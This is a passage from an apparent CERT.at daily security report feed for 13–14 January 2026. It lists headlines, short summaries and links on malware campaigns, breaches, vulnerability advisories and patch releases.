Abstract LLMs are useful because they generalize so well. But can you have too much of a good thing? We show that a small amount of finetuning in narrow contexts can dramatically shift behavior outside those contexts.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.schneier.com/blog/archives/2026/01/corrupting-llms-through-weird-generalizations.html&quot;&gt;https://www.schneier.com/blog/archives/2026/01/corrupting-llms-through-weird-generalizations.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malware Intercepts Googlebot via IP-Verified Conditional Logic&lt;/h3&gt;

Some attackers are increasingly moving away from simple redirects in favor of more selective methods of payload delivery. This approach filters out regular human visitors, allowing attackers to serve malicious content to search engine crawlers while remaining invisible to the website owner.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.sucuri.net/2026/01/malware-intercepts-googlebot-via-ip-verified-conditional-logic.html&quot;&gt;https://blog.sucuri.net/2026/01/malware-intercepts-googlebot-via-ip-verified-conditional-logic.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malicious Chrome Extension Steals MEXC API Keys by Masquerading as Trading Tool&lt;/h3&gt;

Cybersecurity researchers have disclosed details of a malicious Google Chrome extension that's capable of stealing API keys associated with MEXC, a centralized cryptocurrency exchange (CEX) available in over 170 countries, while masquerading as a tool to automate trading on the platform.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/malicious-chrome-extension-steals-mexc.html&quot;&gt;https://thehackernews.com/2026/01/malicious-chrome-extension-steals-mexc.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;New Research: 64% of 3rd-Party Applications Access Sensitive Data Without Justification&lt;/h3&gt;

Research analyzing 4,700 leading websites reveals that 64% of third-party applications now access sensitive data without business justification, up from 51% in 2024. Government sector malicious activity spiked from 2% to 12.9%, while 1 in 7 Education sites show active compromise.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/new-research-64-of-3rd-party.html&quot;&gt;https://thehackernews.com/2026/01/new-research-64-of-3rd-party.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hackers Exploit c-ares DLL Side-Loading to Bypass Security and Deploy Malware&lt;/h3&gt;

Security experts have disclosed details of an active malware campaign that's exploiting a DLL side-loading vulnerability in a legitimate binary associated with the open-source c-ares library to bypass security controls and deliver a wide range of commodity trojans and stealers.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/hackers-exploit-c-ares-dll-side-loading.html&quot;&gt;https://thehackernews.com/2026/01/hackers-exploit-c-ares-dll-side-loading.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Interrail reports data leak: ID document data also affected&lt;/h3&gt;

Data was allegedly exfiltrated from Eurail. The provider also issues Interrail passes on behalf of the German, Austrian and Swiss railways.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Interrail-meldet-Datenleck-Auch-Ausweisdaten-betroffen-11140218.html&quot;&gt;https://www.heise.de/news/Interrail-meldet-Datenleck-Auch-Ausweisdaten-betroffen-11140218.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Criticism of GnuPG and its handling of reported vulnerabilities&lt;/h3&gt;

The problems in the PGP implementation GnuPG demonstrated at 39C3 drew wide-ranging criticism of GnuPG's handling of them, but also of PGP as a whole.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/hintergrund/Kritik-an-GnuPG-und-seinem-Umgang-mit-gemeldeten-Luecken-11132888.html&quot;&gt;https://www.heise.de/hintergrund/Kritik-an-GnuPG-und-seinem-Umgang-mit-gemeldeten-Luecken-11132888.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malware scam: job offers slip malicious repositories to developers&lt;/h3&gt;

Developers now need to be careful with job offers. Criminals are trying to distribute infostealers through them.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Malware-Masche-Jobangebote-jubeln-Entwicklern-boesartige-Repositories-unter-11140776.html&quot;&gt;https://www.heise.de/news/Malware-Masche-Jobangebote-jubeln-Entwicklern-boesartige-Repositories-unter-11140776.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;How real software downloads can hide remote backdoors&lt;/h3&gt;

Attackers use legitimate open-source software as cover, relying on user trust to compromise systems. We dive into an example.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.malwarebytes.com/blog/threat-intel/2026/01/how-real-software-downloads-can-hide-remote-backdoors&quot;&gt;https://www.malwarebytes.com/blog/threat-intel/2026/01/how-real-software-downloads-can-hide-remote-backdoors&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Instagram denies hack after mass password reset emails&lt;/h3&gt;

Reports of stolen data belonging to 17 million users had circulated beforehand. The company denies this and advises ignoring the emails.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.derstandard.at/story/3000000303975/instagram-dementiert-hack-nach-massenhaften-passwort-reset-mails&quot;&gt;https://www.derstandard.at/story/3000000303975/instagram-dementiert-hack-nach-massenhaften-passwort-reset-mails&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Ransomware: Tactical Evolution Fuels Extortion Epidemic&lt;/h3&gt;

New whitepaper reveals record number of attacks as threat landscape evolves with new players and new tactics.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.security.com/threat-intelligence/ransomware-extortion-epidemic&quot;&gt;https://www.security.com/threat-intelligence/ransomware-extortion-epidemic&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;More than 40 countries impacted by North Korea IT worker scams, crypto thefts&lt;/h3&gt;

Eleven countries led a session at the UN headquarters in New York centered around a 140-page report released last fall that covered North Korea's extensive cyber-focused efforts to fund its nuclear and ballistic weapons program.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/40-countries-impacted-nk-it-thefts-united-nations&quot;&gt;https://therecord.media/40-countries-impacted-nk-it-thefts-united-nations&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Poland says it repelled major cyberattack on power grid, blames Russia&lt;/h3&gt;

Poland narrowly avoided a large-scale power outage by thwarting what officials described as the most serious cyberattack on its energy infrastructure in years.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/poland-cyberattack-grid-russia&quot;&gt;https://therecord.media/poland-cyberattack-grid-russia&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Western cyber agencies warn about threats to industrial operational technology&lt;/h3&gt;

New guidance issued by Britain's National Cyber Security Centre (NCSC), a part of signals and cyber intelligence agency GCHQ, sets out how organizations should securely connect equipment such as industrial control systems, sensors and other critical services.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/cyber-agencies-warn-of-industrial-system-threats&quot;&gt;https://therecord.media/cyber-agencies-warn-of-industrial-system-threats&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Telegram to Add Warning for Proxy Links After IP Leak Concerns&lt;/h3&gt;

Telegram will add a warning for proxy links after reports showed they can expose user IP addresses with a single click, bypassing VPN or privacy settings.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/telegram-add-warning-proxy-links-ip-leak/&quot;&gt;https://hackread.com/telegram-add-warning-proxy-links-ip-leak/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hacker Claims Full Breach of Russia's Max Messenger, Threatens Public Leak&lt;/h3&gt;

A hacker claims a full breach of Russia's Max Messenger, threatening to leak user data and backend systems if demands are not met.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/hacker-russia-max-messenger-breach-data-leak/&quot;&gt;https://hackread.com/hacker-russia-max-messenger-breach-data-leak/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Secure Connectivity Principles for Operational Technology (OT)&lt;/h3&gt;

CISA and the UK National Cyber Security Centre (NCSC-UK), in collaboration with federal and international partners, have released Secure Connectivity Principles for Operational Technology (OT) guidance to help asset owners address increasing business and regulatory pressures for connectivity into operational technology (OT) networks.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/resources-tools/resources/secure-connectivity-principles-operational-technology-ot&quot;&gt;https://www.cisa.gov/resources-tools/resources/secure-connectivity-principles-operational-technology-ot&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Unpatchable Vulnerabilities of Kubernetes: CVE-2020-8554&lt;/h3&gt;

This blog is the first part of a mini-series looking at the four unpatchable CVEs in every Kubernetes cluster.
&lt;p /&gt;
&lt;A HREF=&quot;https://securitylabs.datadoghq.com/articles/unpatchable-kubernetes-vulnerabilities-cve-2020-8554/&quot;&gt;https://securitylabs.datadoghq.com/articles/unpatchable-kubernetes-vulnerabilities-cve-2020-8554/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Wireless-(in)Fidelity: Pentesting Wi-Fi in 2025&lt;/h3&gt;

Despite the advancements that have been made in Wi-Fi security with the arrival of WPA3, some misconfigurations and legacy protocols still remain. In this blogpost, we share insights into Wi-Fi related findings encountered during penetration testing engagements.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.synacktiv.com/en/publications/wireless-infidelity-pentesting-wi-fi-in-2025.html&quot;&gt;https://www.synacktiv.com/en/publications/wireless-infidelity-pentesting-wi-fi-in-2025.html&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Multiple vulnerabilities in EATON UPS Companion&lt;/h3&gt;

EATON UPS Companion provided by Eaton contains multiple vulnerabilities.
&lt;p /&gt;
&lt;A HREF=&quot;https://jvn.jp/en/jp/JVN48187396/&quot;&gt;https://jvn.jp/en/jp/JVN48187396/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft Patch Day: attacks on Windows and Windows Server observed&lt;/h3&gt;

Important security updates for Office, Windows &amp; Co. have been released. Attackers are already exploiting one vulnerability. Further attacks may be imminent.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Patchday-Microsoft-Angreifer-spionieren-Speicherbereiche-in-Windows-aus-11140152.html&quot;&gt;https://www.heise.de/news/Patchday-Microsoft-Angreifer-spionieren-Speicherbereiche-in-Windows-aus-11140152.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Adobe Patch Day: code execution flaws threaten Dreamweaver &amp; Co.&lt;/h3&gt;

Important security updates fix Adobe ColdFusion and InDesign, among other products.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Patchday-Adobe-Schadcode-Luecken-bedrohen-Dreamweaver-Co-11140224.html&quot;&gt;https://www.heise.de/news/Patchday-Adobe-Schadcode-Luecken-bedrohen-Dreamweaver-Co-11140224.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for Wednesday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (sssd), Debian (linux-6.1 and python-parsl), Fedora (chezmoi, complyctl, composer, and firefox), Oracle (kernel), Red Hat (buildah, libpq, podman, postgresql, postgresql16, postgresql:13, postgresql:15, and postgresql:16), SUSE (avahi, curl, ffmpeg-4, ffmpeg-7, firefox, istioctl, k6, kubelogin, libmicrohttpd, libpcap-devel, libpng16, libtasn1-6-32bit, matio, ovmf, python-tornado6, python311-Authlib, and teleport), and Ubuntu (angular.js, python-urllib3, and webkit2gtk).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1054167/&quot;&gt;https://lwn.net/Articles/1054167/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Mitigating Denial-of-Service Vulnerability from Unrecoverable Stack Space Exhaustion for React, Next.js, and APM Users&lt;/h3&gt;

This bug highlights how deeply async_hooks has become embedded in the Node.js ecosystem. What started as a low-level debugging API is now a critical dependency for React Server Components, Next.js, every major APM tool, and any code using AsyncLocalStorage.
&lt;p /&gt;
&lt;A HREF=&quot;https://nodejs.org/en/blog/vulnerability/january-2026-dos-mitigation-async-hooks&quot;&gt;https://nodejs.org/en/blog/vulnerability/january-2026-dos-mitigation-async-hooks&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;F5: K000159546, Python vulnerability CVE-2024-5642&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://my.f5.com/manage/s/article/K000159546&quot;&gt;https://my.f5.com/manage/s/article/K000159546&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-14T18:52:57Z</dc:date></entry><entry><title>Tageszusammenfassung - 13.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-13012026"/><author><name>CERT.at</name></author><updated>2026-01-13T18:50:40Z</updated><published>2026-01-13T18:50:40Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Monday 12-01-2026 18:00 - Tuesday 13-01-2026 18:00
Handler:     Felician Fuchs
Co-Handler:  n/a


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Target's dev server offline after hackers claim to steal source code&lt;/h3&gt;

Hackers are claiming to be selling internal source code belonging to Target Corporation, after publishing what appears to be a sample of stolen code repositories on a public software development platform. After BleepingComputer notified Target, the files were taken offline and the retailer's developer Git server was inaccessible.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/targets-dev-server-offline-after-hackers-claim-to-steal-source-code/&quot;&gt;https://www.bleepingcomputer.com/news/security/targets-dev-server-offline-after-hackers-claim-to-steal-source-code/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;CISA orders feds to patch Gogs RCE flaw exploited in zero-day attacks&lt;/h3&gt;

CISA has ordered government agencies to secure their systems against a high-severity Gogs vulnerability that was exploited in zero-day attacks.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/cisa-orders-feds-to-patch-gogs-rce-flaw-exploited-in-zero-day-attacks/&quot;&gt;https://www.bleepingcomputer.com/news/security/cisa-orders-feds-to-patch-gogs-rce-flaw-exploited-in-zero-day-attacks/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Facebook login thieves now using browser-in-browser trick&lt;/h3&gt;

Hackers over the past six months have relied increasingly more on the browser-in-the-browser (BitB) method to trick users into providing Facebook account credentials.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/facebook-login-thieves-now-using-browser-in-browser-trick/&quot;&gt;https://www.bleepingcomputer.com/news/security/facebook-login-thieves-now-using-browser-in-browser-trick/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Convincing LinkedIn comment-reply tactic used in new phishing&lt;/h3&gt;

Scammers are flooding LinkedIn posts with fake &quot;reply&quot; comments that appear to come from the platform, warning of bogus policy violations and urging users to click external links. Some even abuse LinkedIn's official lnkd.in shortener, making the phishing attempts harder to spot.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/convincing-linkedin-comment-reply-tactic-used-in-new-phishing/&quot;&gt;https://www.bleepingcomputer.com/news/security/convincing-linkedin-comment-reply-tactic-used-in-new-phishing/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;What we know about Iran's Internet shutdown&lt;/h3&gt;

Cloudflare Radar data shows Internet traffic from Iran has effectively dropped to zero since January 8, signaling a complete shutdown in the country and disconnection from the global Internet.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.cloudflare.com/iran-protests-internet-shutdown/&quot;&gt;https://blog.cloudflare.com/iran-protests-internet-shutdown/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;GoBruteforcer Botnet Targets 50K-plus Linux Servers&lt;/h3&gt;

Researchers detailed a souped-up version of the GoBruteforcer botnet that preys on servers with weak credentials and AI-generated configurations.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.darkreading.com/threat-intelligence/gobruteforcer-botnet-targets-50k-plus-linux-servers&quot;&gt;https://www.darkreading.com/threat-intelligence/gobruteforcer-botnet-targets-50k-plus-linux-servers&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;10-point paper: BDEW calls for measures to protect critical infrastructure&lt;/h3&gt;

In a position paper, the German Association of Energy and Water Industries (Bundesverband der Energie- und Wasserwirtschaft, BDEW) calls for strengthening the resilience of critical infrastructures.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/10-punkte-papier-bdew-fordert-massnahmen-zum-schutz-kritischer-infrastruktur-2601-204140.html&quot;&gt;https://www.golem.de/news/10-punkte-papier-bdew-fordert-massnahmen-zum-schutz-kritischer-infrastruktur-2601-204140.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;n8n Supply Chain Attack Abuses Community Nodes to Steal OAuth Tokens&lt;/h3&gt;

Threat actors have been observed uploading a set of eight packages on the npm registry that masqueraded as integrations targeting the n8n workflow automation platform to steal developers' OAuth credentials.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/n8n-supply-chain-attack-abuses.html&quot;&gt;https://thehackernews.com/2026/01/n8n-supply-chain-attack-abuses.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;New Malware Campaign Delivers Remcos RAT Through Multi-Stage Windows Attack&lt;/h3&gt;

Cybersecurity researchers have disclosed details of a new campaign dubbed SHADOW#REACTOR that employs an evasive multi-stage attack chain to deliver a commercially available remote administration tool called Remcos RAT and establish persistent, covert remote access.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/new-malware-campaign-delivers-remcos.html&quot;&gt;https://thehackernews.com/2026/01/new-malware-campaign-delivers-remcos.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;New Advanced Linux VoidLink Malware Targets Cloud and container Environments&lt;/h3&gt;

Cybersecurity researchers have disclosed details of a previously undocumented and feature-rich malware framework codenamed VoidLink that's specifically designed for long-term, stealthy access to Linux-based cloud environments.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/new-advanced-linux-voidlink-malware.html&quot;&gt;https://thehackernews.com/2026/01/new-advanced-linux-voidlink-malware.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Businesses in 2026: Maybe we should finally look into that AI security stuff&lt;/h3&gt;

Survey finds security checks nearly doubled in a year as leaders wise up. The number of organizations that have implemented methods for identifying security risks in the AI tools they use has almost doubled in the space of a year.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/01/12/ai_security_wef_survey/&quot;&gt;https://www.theregister.com/2026/01/12/ai_security_wef_survey/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Mandiant open sources tool to prevent leaky Salesforce misconfigs&lt;/h3&gt;

AuraInspector automates the most common abuses and generates fixes for customers. Mandiant has released an open source tool to help Salesforce admins detect misconfigurations that could expose sensitive data.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/01/13/mandiant_salesforce_tool/&quot;&gt;https://www.theregister.com/2026/01/13/mandiant_salesforce_tool/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Dutch cops cuff alleged AVCheck malware kingpin in Amsterdam&lt;/h3&gt;

33-year-old was under surveillance for some time before returning home from the UAE. Dutch police believe they have arrested a man behind the AVCheck online platform - a service used by cybercrims that Operation Endgame shuttered in May.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/01/13/avcheck_arrest/&quot;&gt;https://www.theregister.com/2026/01/13/avcheck_arrest/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Start of the first ESC ticket wave: beware of dubious offers!&lt;/h3&gt;

The time has finally come: advance ticket sales for the Eurovision Song Contest 2026 have begun! But fans should be especially careful, because dubious sellers are trying to profit outside the official sales platforms.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/start-der-ersten-esc-ticketwelle-vorsicht-vor-unserioesen-angeboten/&quot;&gt;https://www.watchlist-internet.at/news/start-der-ersten-esc-ticketwelle-vorsicht-vor-unserioesen-angeboten/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;New phishing wave: outstanding payments to the tax office&lt;/h3&gt;

Once again, criminals are posing as the Bundesministerium für Finanzen (Austrian Federal Ministry of Finance). They are currently targeting both private individuals and companies. In both cases, allegedly outstanding payments are to be settled by bank transfer - to an account abroad.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/phishing-ausstehende-zahlungen-finanzamt/&quot;&gt;https://www.watchlist-internet.at/news/phishing-ausstehende-zahlungen-finanzamt/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Latin America Sees Sharpest Rise in Cyber Attacks in December 2025 as Ransomware Activity Accelerates&lt;/h3&gt;

In December 2025, organizations experienced an average of 2,027 cyber attacks per organization per week. This represents a 1% month-over-month increase and a 9% year-over-year increase. While overall growth remained moderate, Latin America recorded the sharpest regional increase, with organizations experiencing an average of 3,065 attacks per week, a 26% increase year over year.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.checkpoint.com/research/latin-america-sees-sharpest-rise-in-cyber-attacks-in-december-2025-as-ransomware-activity-accelerates/&quot;&gt;https://blog.checkpoint.com/research/latin-america-sees-sharpest-rise-in-cyber-attacks-in-december-2025-as-ransomware-activity-accelerates/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;VoidLink: The Cloud-Native Malware Framework Weaponizing Linux Infrastructure&lt;/h3&gt;

Key Points: VoidLink is a cloud-native Linux malware framework built to maintain long-term, stealthy access to cloud infrastructure rather than targeting individual endpoints. It reflects a shift in attacker focus away from Windows systems toward the Linux environments that power cloud services and critical operations. Its modular, plug-in-driven design allows threat actors to customize capabilities over time, expanding attacks quietly as objectives evolve.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.checkpoint.com/research/voidlink-the-cloud-native-malware-framework-weaponizing-linux-infrastructure/&quot;&gt;https://blog.checkpoint.com/research/voidlink-the-cloud-native-malware-framework-weaponizing-linux-infrastructure/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Sweden detains ex-military IT consultant suspected of spying for Russia&lt;/h3&gt;

A 33-year-old former IT consultant for Sweden's Armed Forces has been detained on suspicions of spying for Russian intelligence, Swedish prosecutors said.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/sweden-detains-it-consultant-russia&quot;&gt;https://therecord.media/sweden-detains-it-consultant-russia&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;0patch micropatch for CredSSP vulnerability CVE-2025-47987&lt;/h3&gt;

A small addendum from last week, ahead of the January 2026 Patch Day. ACROS Security has released a 0patch micropatch for an Elevation of Privilege (EoP) vulnerability, CVE-2025-47987, in the Credential Security Support Provider Protocol (CredSSP).
&lt;p /&gt;
&lt;A HREF=&quot;https://borncity.com/blog/2026/01/13/0patch-micropatch-fuer-credssp-schwachstelle-cve-2025-47987/&quot;&gt;https://borncity.com/blog/2026/01/13/0patch-micropatch-fuer-credssp-schwachstelle-cve-2025-47987/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;End of support for Microsoft products in 2026&lt;/h3&gt;

The year 2026 brings users of Microsoft products several dates on which support ends. These range from various Windows versions that will then no longer receive updates to Microsoft Office 2021.
&lt;p /&gt;
&lt;A HREF=&quot;https://borncity.com/blog/2026/01/13/end-of-support-fuer-microsoft-produkte-in-2026/&quot;&gt;https://borncity.com/blog/2026/01/13/end-of-support-fuer-microsoft-produkte-in-2026/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Russian BlueDelta (Fancy Bear) Uses PDFs to Steal Logins in Just 2 Seconds&lt;/h3&gt;

New research from Recorded Future reveals how Russian state hackers (BlueDelta) are using fake Microsoft and Google login portals to steal credentials. The campaign involves using legitimate PDF lures from GRC and EcoClimate to trick victims.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/russian-bluedelta-fancy-bear-pdfs-steal-login/&quot;&gt;https://hackread.com/russian-bluedelta-fancy-bear-pdfs-steal-login/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Widespread Magecart Campaign Targets Users of All Major Credit Cards&lt;/h3&gt;

Researchers at Silent Push have exposed a global Magecart campaign stealing credit card data since 2022. Learn how this invisible web-skimming attack targets major networks like Mastercard and Amex, and how to stay safe.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/magecart-targets-all-credit-cards-users/&quot;&gt;https://hackread.com/magecart-targets-all-credit-cards-users/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;K7 Antivirus: Named pipe abuse, registry manipulation and privilege escalation (CVE-2025-67826)&lt;/h3&gt;

When hunting for privilege escalation vulnerabilities, named pipes are a goldmine. Antivirus products often use named pipes to allow unprivileged users to trigger privileged operations, making them especially promising targets for this class of vulnerability.
&lt;p /&gt;
&lt;A HREF=&quot;http://blog.quarkslab.com/k7-antivirus-named-pipe-abuse-registry-manipulation-and-privilege-escalation.html&quot;&gt;http://blog.quarkslab.com/k7-antivirus-named-pipe-abuse-registry-manipulation-and-privilege-escalation.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;How GitHub could secure npm&lt;/h3&gt;

In 2025, npm experienced an unprecedented number of compromised packages in a series of coordinated attacks on the JavaScript open source supply chain. These packages ranged from crypto-stealing malware to credential-stealing exploits. While GitHub announced changes to address these attacks, many maintainers (myself included) found the response insufficient.
&lt;p /&gt;
&lt;A HREF=&quot;https://humanwhocodes.com/blog/2026/01/how-github-could-secure-npm/&quot;&gt;https://humanwhocodes.com/blog/2026/01/how-github-could-secure-npm/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Shai Hulud 2.0 Campaign&lt;/h3&gt;

Shai-Hulud 2.0 represents one of the most severe supply chain compromises observed in the modern cloud-native ecosystem.
The campaign involved the manipulation of hundreds of publicly available packages and specifically targeted developer workstations, CI/CD pipelines, and cloud workloads to harvest credentials and sensitive configuration data.
&lt;p /&gt;
&lt;A HREF=&quot;https://detect.fyi/shai-hulud-2-0-campaign-be390e502f28?source=rssd5fd8f494f6a4&quot;&gt;https://detect.fyi/shai-hulud-2-0-campaign-be390e502f28?source=rssd5fd8f494f6a4&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malicious Chrome Extension Steals MEXC API Keys for Account Takeover&lt;/h3&gt;

Socket's Threat Research Team identified a malicious Chrome extension, MEXC API Automator, published to the Chrome Web Store on September 1, 2025, by a threat actor under the alias jorjortan142.
&lt;p /&gt;
&lt;A HREF=&quot;https://socket.dev/blog/malicious-chrome-extension-steals-mexc-api-keys?utm_medium=feed&quot;&gt;https://socket.dev/blog/malicious-chrome-extension-steals-mexc-api-keys?utm_medium=feed&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fixing ESC1 - Enrollee supplies subject and template allows client authentication&lt;/h3&gt;

ADCS misconfigurations are one of the most common privilege escalation vectors we encounter. This article covers steps to remediate ESC1 flaws.
&lt;p /&gt;
&lt;A HREF=&quot;https://projectblack.io/blog/fixing-esc1-enrollee-supplies-subject-and-template-allows-client-authentication/&quot;&gt;https://projectblack.io/blog/fixing-esc1-enrollee-supplies-subject-and-template-allows-client-authentication/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Lack of isolation in agentic browsers resurfaces old vulnerabilities&lt;/h3&gt;

With browser-embedded AI agents, we're essentially starting the security journey over again. We exploited a lack of isolation mechanisms in multiple agentic browsers to perform attacks ranging from the dissemination of false information to cross-site data leaks.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.trailofbits.com/2026/01/13/lack-of-isolation-in-agentic-browsers-resurfaces-old-vulnerabilities/&quot;&gt;https://blog.trailofbits.com/2026/01/13/lack-of-isolation-in-agentic-browsers-resurfaces-old-vulnerabilities/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Unauthenticated access to local configuration&lt;/h3&gt;

CVSSv3 Score: 9.3. An exposure of sensitive information to an unauthorized actor [CWE-200] vulnerability in FortiFone Web Portal page may allow an unauthenticated attacker to obtain the device configuration via crafted HTTP or HTTPS requests.
&lt;p /&gt;
&lt;A HREF=&quot;https://fortiguard.fortinet.com/psirt/FG-IR-25-260&quot;&gt;https://fortiguard.fortinet.com/psirt/FG-IR-25-260&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Unauthenticated remote command injection&lt;/h3&gt;

CVSSv3 Score: 9.4. An improper neutralization of special elements used in an OS command (OS Command Injection) vulnerability [CWE-78] in FortiSIEM may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests.
&lt;p /&gt;
&lt;A HREF=&quot;https://fortiguard.fortinet.com/psirt/FG-IR-25-772&quot;&gt;https://fortiguard.fortinet.com/psirt/FG-IR-25-772&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;SAP Security Patch Day January 2026&lt;/h3&gt;

SAP has released its January 2026 security patch package containing 17 security notes addressing critical vulnerabilities across enterprise SAP environments. This release includes four HotNews vulnerabilities with CVSS ratings up to 9.9, four High priority issues, seven Medium priority fixes, and two Low priority updates. The patches affect SAP S/4HANA, SAP HANA database, SAP NetWeaver, SAP Wily Introscope, and various application components.
&lt;p /&gt;
&lt;A HREF=&quot;https://redrays.io/blog/sap-security-patch-day-january-2026/&quot;&gt;https://redrays.io/blog/sap-security-patch-day-january-2026/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;TinyWeb: Windows web server allows code injection&lt;/h3&gt;

In the lightweight TinyWeb web server for Windows, attackers from the network can inject arbitrary code. An update fixes the issue.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/TinyWeb-Windows-Web-Server-ermoeglicht-Codeschmuggel-11138924.html&quot;&gt;https://www.heise.de/news/TinyWeb-Windows-Web-Server-ermoeglicht-Codeschmuggel-11138924.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;TYPO3-CORE-SA-2026-003: Broken Access Control in Recycler Module&lt;/h3&gt;

It has been discovered that TYPO3 CMS is susceptible to broken access control.
&lt;p /&gt;
